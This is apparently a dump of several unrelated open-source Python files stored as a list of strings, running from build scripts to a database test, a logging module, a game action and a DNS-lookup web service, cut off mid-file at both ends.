License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering'\n ]}\n\nif have_setuptools:\n kwargs.update({\n # Required dependencies\n 'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'],\n\n # Optional dependencies\n 'extras_require': {\n 'decay': ['uncertainties'],\n 'pandas': ['pandas>=0.17.0'],\n 'sparse' : ['scipy'],\n 'vtk': ['vtk', 'silomesh'],\n 'validate': ['lxml']\n },\n\n # Data files\n 'package_data': {\n 'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5']\n },\n })\n\n# If Cython is present, add resonance reconstruction capability\nif have_cython:\n kwargs.update({\n 'ext_modules': cythonize('openmc/data/reconstruct.pyx'),\n 'include_dirs': [np.get_include()]\n })\n\nsetup(**kwargs)\n"", ""#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport codecs\nfrom setuptools import setup\n\n\ndef read(fname):\n file_path = os.path.join(os.path.dirname(__file__), fname)\n return codecs.open(file_path, encoding='utf-8').read()\n\n\nsetup(\n name='pytest-concurrent',\n version='0.2.2',\n author='James Wang, Reverb Chu',\n author_email='jamesw96@uw.edu, dummy@email.com',\n maintainer='James Wang, Reverb Chu',\n maintainer_email='jamesw96@uw.edu, dummy@email.com',\n license='MIT',\n url='https://github.com/reverbc/pytest-concurrent',\n description='Concurrently execute test cases with multithread'\n ', multiprocess and gevent',\n long_description=read('README.rst'),\n packages=['pytest_concurrent', 'pytest_concurrent.modes'],\n install_requires=[\n 'pytest>=3.1.1',\n 'psutil>=5.2.2'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Framework :: Pytest',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Operating System :: OS Independent',\n 'License :: OSI Approved :: MIT License',\n ],\n entry_points={\n 'pytest11': [\n 'concurrent = pytest_concurrent.plugin',\n ],\n },\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n)\n"", '# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom .unittestbase import PostgreSQLTestCase\nfrom nose.plugins.attrib import attr\nfrom nose.tools import eq_, assert_raises\nimport datetime\n\nfrom socorro.external.postgresql.backfill import Backfill\nfrom socorro.external.postgresql import staticdata, fakedata\nfrom socorro.external import MissingArgumentError\nfrom socorro.lib import datetimeutil\n\n\n#==============================================================================\n@attr(integration=\'postgres\')\nclass TestBackfill(PostgreSQLTestCase):\n """"""Tests the calling of all backfill functions""""""\n\n #--------------------------------------------------------------------------\n def setUp(self):\n """""" Populate tables with fake data """"""\n super(TestBackfill, self).setUp()\n\n cursor = self.connection.cursor()\n\n self.tables = []\n\n for table in staticdata.tables + fakedata.tables:\n # staticdata has no concept of duration\n if table.__module__ == \'socorro.external.postgresql.staticdata\':\n table = table()\n else:\n table = table(days=1)\n table.releases = {\n \'WaterWolf\': {\n \'channels\': {\n \'Nightly\': {\n \'versions\': [{\n \'number\': \'18.0\',\n \'probability\': 0.5,\n \'buildid\': \'%s000020\'\n }],\n \'adu\': \'10\',\n \'repository\': \'nightly\',\n \'throttle\': \'1\',\n \'update_channel\': \'nightly\',\n },\n },\n \'crashes_per_hour\': \'5\',\n \'guid\': dummy@email.com\'\n },\n \'B2G\': {\n \'channels\': {\n \'Nightly\': {\n \'versions\': [{\n \'number\': \'18.0\',\n \'probability\': 0.5,\n \'buildid\': \'%s000020\'\n }],\n \'adu\': \'10\',\n \'repository\': \'nightly\',\n \'throttle\': \'1\',\n \'update_channel\': \'nightly\',\n },\n },\n \'crashes_per_hour\': \'5\',\n \'guid\': dummy@email.com\'\n }\n }\n\n\n table_name = table.table\n table_columns = table.columns\n values = str(tuple([""%("" + i + "")s"" for i in table_columns]))\n columns = str(tuple(table_columns))\n self.tables.append(table_name)\n\n # TODO: backfill_reports_clean() sometimes tries to insert a\n # os_version_id that already exists\n if table_name is not ""os_versions"":\n for rows in table.generate_rows():\n data = dict(zip(table_columns, rows))\n query = ""INSERT INTO %(table)s "" % {\'table\': table_name}\n query = query + columns.replace(""\'"", """").replace("",)"", "")"")\n query = query + "" VALUES ""\n query = query + values.replace("",)"", "")"").replace(""\'"", """")\n\n cursor.execute(query, data)\n self.connection.commit()\n\n #--------------------------------------------------------------------------\n def tearDown(self):\n """""" Cleanup the database, delete tables and functions """"""\n\n cursor = self.connection.cursor()\n tables = str(self.tables).replace(""["", """").replace(""]"", """")\n cursor.execute(""TRUNCATE "" + tables.replace(""\'"", """") + "" CASCADE;"")\n\n self.connection.commit()\n self.connection.close()\n\n super(TestBackfill, self).tearDown()\n\n #--------------------------------------------------------------------------\n def setup_data(self):\n\n self.now = datetimeutil.utc_now()\n now = self.now.date()\n yesterday = now - datetime.timedelta(days=1)\n lastweek = now - datetime.timedelta(days=7)\n now_str = datetimeutil.date_to_string(now)\n yesterday_str = datetimeutil.date_to_string(yesterday)\n lastweek_str = datetimeutil.date_to_string(lastweek)\n\n self.test_source_data = {\n # Test backfill_adu\n \'adu\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_all_dups\n \'all_dups\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""end_date"": now_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_build_adu\n \'build_adu\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_correlations\n \'correlations\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_crashes_by_user_build\n \'crashes_by_user_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_crashes_by_user\n \'crashes_by_user\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n\n # TODO: Test backfill_daily_crashes tries to insert into a table\n # that do not exists. It can be fixed by creating a temporary one.\n #\'daily_crashes\': {\n # \'params\': {\n # ""update_day"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # Test backfill_exploitability\n \'exploitability\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_explosiveness\n \'explosiveness\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_home_page_graph_build\n \'home_page_graph_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_home_page_graph\n \'home_page_graph\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_matviews\n \'matviews\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""reports_clean"": \'false\',\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_nightly_builds\n \'nightly_builds\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_rank_compare\n \'rank_compare\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_reports_clean\n \'reports_clean\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""end_date"": now_str,\n },\n \'res_expected\': [(True,)],\n },\n\n # TODO: Test backfill_reports_duplicates tries to insert into a\n # table that do not exists. It can be fixed by using the update\n # function inside of the backfill.\n #\'reports_duplicates\': {\n # \'params\': {\n # ""start_date"": yesterday_str,\n # ""end_date"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # TODO: Test backfill_signature_counts tries to insert into\n # tables and to update functions that does not exist.\n #\'signature_counts\': {\n # \'params\': {\n # ""start_date"": yesterday_str,\n # ""end_date"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # Test backfill_tcbs_build\n \'tcbs_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_tcbs\n \'tcbs\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_weekly_report_partitions\n \'weekly_report_partitions\': {\n \'params\': {\n ""start_date"": lastweek_str,\n ""end_date"": now_str,\n ""table_name"": \'raw_crashes\',\n },\n \'res_expected\': [(True,)],\n },\n # TODO: Update Backfill to support signature_summary backfill\n # through the API\n #\'signature_summary_products\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_installations\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_uptime\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_os\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_process_type\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_architecture\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_flash_version\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_device\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_graphics\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n }\n\n #--------------------------------------------------------------------------\n def test_get(self):\n\n backfill = Backfill(config=self.config)\n\n #......................................................................\n # Test raise error if kind of backfill is not passed\n params = {""backfill_type"": \'\'}\n assert_raises(MissingArgumentError, backfill.get, **params)\n\n #......................................................................\n # Test all the backfill functions\n self.setup_data()\n for test, data in self.test_source_data.items():\n data[\'params\'][\'backfill_type\'] = str(test)\n res = backfill.get(**data[\'params\'])\n eq_(res[0], data[\'res_expected\'][0])\n', '# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2015, Nicolas P. Rougier\n# Distributed under the (new) BSD License.\n#\n# Contributors: Nicolas P. Rougier (dummy@email.com)\n# -----------------------------------------------------------------------------\n\n# --- Time ---\nms = 0.001\ndt = 1*ms\ntau = 10*ms\n\n# --- Learning ---\nalpha_CUE = 0.050\nalpha_LTP = 0.002\nalpha_LTD = 0.001\n\n# --- Sigmoid ---\nVmin = 0\nVmax = 20\nVh = 16\nVc = 3\n\n# --- Model ---\ndecision_threshold = 40\nnoise = 0.001\nCTX_rest = -3.0\nSTR_rest = 0.0\nSTN_rest = -10.0\nGPI_rest = 10.0\nTHL_rest = -40.0\n\n# --- Cues & Rewards ---\nV_cue = 7\nrewards = 3/3.,2/3.,1/3.,0/3.\n\n# -- Weight ---\nWmin = 0.25\nWmax = 0.75\ngains = { ""CTX.cog -> STR.cog"" : +1.0,\n ""CTX.mot -> STR.mot"" : +1.0,\n ""CTX.ass -> STR.ass"" : +1.0,\n ""CTX.cog -> STR.ass"" : +0.2,\n ""CTX.mot -> STR.ass"" : +0.2,\n ""CTX.cog -> STN.cog"" : +1.0,\n ""CTX.mot -> STN.mot"" : +1.0,\n ""STR.cog -> GPI.cog"" : -2.0,\n ""STR.mot -> GPI.mot"" : -2.0,\n ""STR.ass -> GPI.cog"" : -2.0,\n ""STR.ass -> GPI.mot"" : -2.0,\n ""STN.cog -> GPI.cog"" : +1.0,\n ""STN.mot -> GPI.mot"" : +1.0,\n ""GPI.cog -> THL.cog"" : -0.25,\n ""GPI.mot -> THL.mot"" : -0.25,\n\n ""THL.cog -> CTX.cog"" : +0.4,\n ""THL.mot -> CTX.mot"" : +0.4,\n ""CTX.cog -> THL.cog"" : +0.1,\n ""CTX.mot -> THL.mot"" : +0.1,\n\n ""CTX.mot -> CTX.mot"" : +0.5,\n ""CTX.cog -> CTX.cog"" : +0.5,\n ""CTX.ass -> CTX.ass"" : +0.5,\n\n ""CTX.ass -> CTX.cog"" : +0.01,\n ""CTX.ass -> CTX.mot"" : +0.025,\n ""CTX.cog -> CTX.ass"" : +0.025,\n ""CTX.mot -> CTX.ass"" : +0.01,\n }\n', '# encoding: utf-8\n#\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (dummy@email.com)\n#\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport os\nimport platform\nimport sys\nfrom datetime import datetime\n\nfrom mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap\nfrom mo_future import PY3, is_text, text\nfrom mo_logs import constants, exceptions, strings\nfrom mo_logs.exceptions import Except, LogItem, suppress_exception\nfrom mo_logs.strings import CR, indent\n\n_Thread = None\nif PY3:\n STDOUT = sys.stdout.buffer\nelse:\n STDOUT = sys.stdout\n\n\nclass Log(object):\n """"""\n FOR STRUCTURED LOGGING AND EXCEPTION CHAINING\n """"""\n trace = False\n main_log = None\n logging_multi = None\n profiler = None # simple pypy-friendly profiler\n error_mode = False # prevent error loops\n\n @classmethod\n def start(cls, settings=None):\n """"""\n RUN ME FIRST TO SETUP THE THREADED LOGGING\n http://victorlin.me/2012/08/good-logging-practice-in-python/\n\n log - LIST OF PARAMETERS FOR LOGGER(S)\n trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False)\n cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False)\n USE THE LONG FORM TO SET THE FILENAME {""enabled"": True, ""filename"": ""cprofile.tab""}\n profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler(""some description""):)\n USE THE LONG FORM TO SET FILENAME {""enabled"": True, ""filename"": ""profile.tab""}\n constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE)\n """"""\n global _Thread\n if not settings:\n return\n settings = wrap(settings)\n\n Log.stop()\n\n cls.settings = settings\n cls.trace = coalesce(settings.trace, False)\n if cls.trace:\n from mo_threads import Thread as _Thread\n _ = _Thread\n\n # ENABLE CPROFILE\n if settings.cprofile is False:\n settings.cprofile = {""enabled"": False}\n elif settings.cprofile is True:\n if isinstance(settings.cprofile, bool):\n settings.cprofile = {""enabled"": True, ""filename"": ""cprofile.tab""}\n if settings.cprofile.enabled:\n from mo_threads import profiles\n profiles.enable_profilers(settings.cprofile.filename)\n\n if settings.profile is True or (is_data(settings.profile) and settings.profile.enabled):\n Log.error(""REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18"")\n # from mo_logs import profiles\n #\n # if isinstance(settings.profile, bool):\n # profiles.ON = True\n # settings.profile = {""enabled"": True, ""filename"": ""profile.tab""}\n #\n # if settings.profile.enabled:\n # profiles.ON = True\n\n if settings.constants:\n constants.set(settings.constants)\n\n logs = coalesce(settings.log, settings.logs)\n if logs:\n cls.logging_multi = StructuredLogger_usingMulti()\n for log in listwrap(logs):\n Log.add_log(Log.new_instance(log))\n\n from mo_logs.log_usingThread import StructuredLogger_usingThread\n cls.main_log = StructuredLogger_usingThread(cls.logging_multi)\n\n @classmethod\n def stop(cls):\n """"""\n DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING\n EXECUTING MULUTIPLE TIMES IN A ROW IS SAFE, IT HAS NO NET EFFECT, IT STILL LOGS TO stdout\n :return: NOTHING\n """"""\n main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT)\n main_log.stop()\n\n @classmethod\n def new_instance(cls, settings):\n settings = wrap(settings)\n\n if settings[""class""]:\n if settings[""class""].startswith(""logging.handlers.""):\n from mo_logs.log_usingHandler import StructuredLogger_usingHandler\n\n return StructuredLogger_usingHandler(settings)\n else:\n with suppress_exception:\n from mo_logs.log_usingLogger import make_log_from_settings\n\n return make_log_from_settings(settings)\n # OH WELL :(\n\n if settings.log_type == ""logger"":\n from mo_logs.log_usingLogger import StructuredLogger_usingLogger\n return StructuredLogger_usingLogger(settings)\n if settings.log_type == ""file"" or settings.file:\n return StructuredLogger_usingFile(settings.file)\n if settings.log_type == ""file"" or settings.filename:\n return StructuredLogger_usingFile(settings.filename)\n if settings.log_type == ""console"":\n from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream\n return StructuredLogger_usingThreadedStream(STDOUT)\n if settings.log_type == ""mozlog"":\n from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog\n return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname))\n if settings.log_type == ""stream"" or settings.stream:\n from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream\n return StructuredLogger_usingThreadedStream(settings.stream)\n if settings.log_type == ""elasticsearch"" or settings.stream:\n from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch\n return StructuredLogger_usingElasticSearch(settings)\n if settings.log_type == ""email"":\n from mo_logs.log_usingEmail import StructuredLogger_usingEmail\n return StructuredLogger_usingEmail(settings)\n if settings.log_type == ""ses"":\n from mo_logs.log_usingSES import StructuredLogger_usingSES\n return StructuredLogger_usingSES(settings)\n if settings.log_type.lower() in [""nothing"", ""none"", ""null""]:\n from mo_logs.log_usingNothing import StructuredLogger\n return StructuredLogger()\n\n Log.error(""Log type of {{log_type|quote}} is not recognized"", log_type=settings.log_type)\n\n @classmethod\n def add_log(cls, log):\n cls.logging_multi.add_log(log)\n\n @classmethod\n def note(\n cls,\n template,\n default_params={},\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.note was expecting a unicode template"")\n\n Log._annotate(\n LogItem(\n context=exceptions.NOTE,\n format=template,\n template=template,\n params=dict(default_params, **more_params)\n ),\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def unexpected(\n cls,\n template,\n default_params={},\n cause=None,\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.warning was expecting a unicode template"")\n\n if isinstance(default_params, BaseException):\n cause = default_params\n default_params = {}\n\n if ""values"" in more_params.keys():\n Log.error(""Can not handle a logging parameter by name `values`"")\n\n params = Data(dict(default_params, **more_params))\n cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace)\n Log._annotate(\n e,\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def alarm(\n cls,\n template,\n default_params={},\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n format = (""*"" * 80) + CR + indent(template, prefix=""** "").strip() + CR + (""*"" * 80)\n Log._annotate(\n LogItem(\n context=exceptions.ALARM,\n format=format,\n template=template,\n params=dict(default_params, **more_params)\n ),\n timestamp,\n stack_depth + 1\n )\n\n alert = alarm\n\n @classmethod\n def warning(\n cls,\n template,\n default_params={},\n cause=None,\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.warning was expecting a unicode template"")\n\n if isinstance(default_params, BaseException):\n cause = default_params\n default_params = {}\n\n if ""values"" in more_params.keys():\n Log.error(""Can not handle a logging parameter by name `values`"")\n\n params = Data(dict(default_params, **more_params))\n cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace)\n Log._annotate(\n e,\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def error(\n cls,\n template, # human readable template\n default_params={}, # parameters for template\n cause=None, # pausible cause\n stack_depth=0,\n **more_params\n ):\n """"""\n raise an exception with a trace for the cause too\n\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n if not is_text(template):\n sys.stderr.write(str(""Log.error was expecting a unicode template""))\n Log.error(""Log.error was expecting a unicode template"")\n\n if default_params and isinstance(listwrap(default_params)[0], BaseException):\n cause = default_params\n default_params = {}\n\n params = Data(dict(default_params, **more_params))\n\n add_to_trace = False\n if cause == None:\n causes = None\n elif is_list(cause):\n causes = []\n for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR)\n causes.append(Except.wrap(c, stack_depth=1))\n causes = FlatList(causes)\n elif isinstance(cause, BaseException):\n causes = Except.wrap(cause, stack_depth=1)\n else:\n causes = None\n Log.error(""can only accept Exception, or list of exceptions"")\n\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n if add_to_trace:\n cause[0].trace.extend(trace[1:])\n\n e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace)\n raise_from_none(e)\n\n @classmethod\n def _annotate(\n cls,\n item,\n timestamp,\n stack_depth\n ):\n """"""\n :param itemt: A LogItemTHE TYPE OF MESSAGE\n :param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM\n :return:\n """"""\n item.timestamp = timestamp\n item.machine = machine_metadata\n item.template = strings.limit(item.template, 10000)\n\n item.format = strings.limit(item.format, 10000)\n if item.format == None:\n format = text(item)\n else:\n format = item.format.replace(""{{"", ""{{params."")\n if not format.startswith(CR) and format.find(CR) > -1:\n format = CR + format\n\n if cls.trace:\n log_format = item.format = ""{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \\""{{location.file}}:{{location.line}}\\"" - ({{location.method}}) - "" + format\n f = sys._getframe(stack_depth + 1)\n item.location = {\n ""line"": f.f_lineno,\n ""file"": text(f.f_code.co_filename),\n ""method"": text(f.f_code.co_name)\n }\n thread = _Thread.current()\n item.thread = {""name"": thread.name, ""id"": thread.id}\n else:\n log_format = item.format = ""{{timestamp|datetime}} - "" + format\n\n cls.main_log.write(log_format, item.__data__())\n\n def write(self):\n raise NotImplementedError\n\n\ndef _same_frame(frameA, frameB):\n return (frameA.line, frameA.file) == (frameB.line, frameB.file)\n\n\n# GET THE MACHINE METADATA\nmachine_metadata = wrap({\n ""pid"": os.getpid(),\n ""python"": text(platform.python_implementation()),\n ""os"": text(platform.system() + platform.release()).strip(),\n ""name"": text(platform.node())\n})\n\n\ndef raise_from_none(e):\n raise e\n\nif PY3:\n exec(""def raise_from_none(e):\\n raise e from None\\n"", globals(), locals())\n\n\nfrom mo_logs.log_usingFile import StructuredLogger_usingFile\nfrom mo_logs.log_usingMulti import StructuredLogger_usingMulti\nfrom mo_logs.log_usingStream import StructuredLogger_usingStream\n\n\nif not Log.main_log:\n Log.main_log = StructuredLogger_usingStream(STDOUT)\n\n', '# This file is part of Beneath a Binary Sky.\n# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com\n#\n# Beneath a Binary Sky is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# Beneath a Binary Sky is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Beneath a Binary Sky. If not, see\n# .\n\nimport time\n\nfrom actions.action import Action\nfrom actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError\nfrom world.world import World\nfrom database.exceptions import LockAlreadyAquiredError\n\n\nclass WaterAction(Action):\n\n def __init__(self):\n super().__init__()\n\n self._world = World()\n\n def do_action(self, robot, args):\n \'\'\'Waters the square robot stands on.\n\n @param robot: Instance of `objects.robot.Robot\'.\n \'\'\'\n if len(args) != 1:\n raise InvalidArgumentsError(""`water\' action takes no arguments."")\n\n if not robot.get_has_water():\n raise RobotHaveNoWaterError(""Robot does not carry water."")\n\n try:\n square = self._world.get_square(robot.get_location(), for_update=True)\n except LockAlreadyAquiredError:\n # Waiting a little, and trying one more time.\n time.sleep(0.02)\n square = self._world.get_square(robot.get_location(), for_update=True)\n\n # Note: we don\'t raise an exception if there\'s no plant. A robot can waste its water.\n plant = square.get_plant()\n if plant is not None:\n plant.set_water_level(100)\n robot.set_honor(robot.get_honor() + 1)\n\n robot.set_has_water(False)\n', '#!/usr/bin/env python3\n\nimport os, logging, argparse, json, datetime\nimport requests\nimport dns.resolver\nfrom bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template\n\ndef set_content_type(fn):\n\tdef _return_type(*args, **kwargs):\n\t\tif request.headers.get(\'Accept\') == ""application/json"":\n\t\t\tresponse.headers[\'Content-Type\'] = \'application/json\'\n\t\tif request.headers.get(\'Accept\') == ""text/plain"":\n\t\t\tresponse.headers[\'Content-Type\'] = \'text/plain\'\n\t\tif request.method != \'OPTIONS\':\n\t\t\treturn fn(*args, **kwargs)\n\treturn _return_type\n\ndef enable_cors(fn):\n\tdef _enable_cors(*args, **kwargs):\n\t\tresponse.headers[\'Access-Control-Allow-Origin\'] = \'*\'\n\t\tresponse.headers[\'Access-Control-Allow-Methods\'] = \'GET, POST, PUT, OPTIONS\'\n\t\tresponse.headers[\'Access-Control-Allow-Headers\'] = \'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token\'\n\n\t\tif request.method != \'OPTIONS\':\n\t\t\treturn fn(*args, **kwargs)\n\treturn _enable_cors\n\ndef resolveDomain(domain, recordType, args):\n\trecords = []\n\n\tif args.doh:\n\t\ttry:\n\t\t\tpayload = {\n\t\t\t\t\'name\': domain,\n\t\t\t\t\'type\': recordType\n\t\t\t}\n\t\t\tdata = requests.get(""{}"".format(args.resolver), params=payload)\n\t\t\tfor rec in data.json()[\'Answer\']:\n\t\t\t\trecords.append(rec[\'data\'])\n\t\texcept:\n\t\t\treturn records\n\t\treturn records\n\telse:\n\t\ttry:\n\t\t\tresolver = dns.resolver.Resolver()\n\t\t\tresolver.nameservers = args.resolver.split(\',\')\n\t\t\t\n\t\t\tif recordType in args.records.split(\',\'):\n\t\t\t\tlookup = resolver.resolve(domain, recordType)\n\t\t\t\tfor data in lookup:\n\t\t\t\t\tif recordType in [\'A\', \'AAAA\']:\n\t\t\t\t\t\trecords.append(data.address)\n\t\t\t\t\telif recordType in [\'TXT\']:\n\t\t\t\t\t\tfor rec in data.strings:\n\t\t\t\t\t\t\trecords.append(rec.decode(""utf-8"").replace(\'""\', \'\').strip())\n\t\t\t\t\telse:\n\t\t\t\t\t\trecords.append(str(data).replace(\'""\', \'\').strip())\n\t\t\treturn records\n\t\texcept dns.resolver.NXDOMAIN:\n\t\t\treturn records\n\t\texcept dns.resolver.NoAnswer:\n\t\t\treturn records\n\t\texcept dns.exception.Timeout:\n\t\t\treturn records\n\t\texcept dns.resolver.NoNameservers:\n\t\t\treturn records\n\t\t\n@error(\'404\')\n@error(\'403\')\ndef returnError(code, msg, contentType=""text/plain""):\n\tresponse.status = int(code)\n\tresponse.content_type = contentType\n\treturn template(\'error\')\n\n@route(\'/static/\')\ndef static(filepath):\n\treturn static_file(filepath, root=\'views/static\')\n\n@route(\'/servers\')\ndef servers():\n\ttry:\n\t\tresponse.content_type = \'text/plain\'\n\t\treturn ""\\r\\n"".join(args.resolver.split("",""))\n\texcept:\n\t\treturn ""Unable to open servers file.""\n\t\t\n@route(\'/version\')\ndef version():\n\ttry:\n\t\tdirname, filename = os.path.split(os.path.abspath(__file__))\n\t\tdel filename\n\t\tf = open(os.getenv(\'VERSION_PATH\', dirname + \'/.git/refs/heads/master\'), \'r\')\n\t\tcontent = f.read()\n\t\tresponse.content_type = \'text/plain\'\n\t\treturn content\n\texcept:\n\t\treturn ""Unable to open version file.""\n\n@route(\'/\')\ndef route_redirect(record):\n\treturn redirect(""/{}/A"".format(record))\n\n@route(\'//\')\n@route(\'//.\')\n@set_content_type\n@enable_cors\ndef 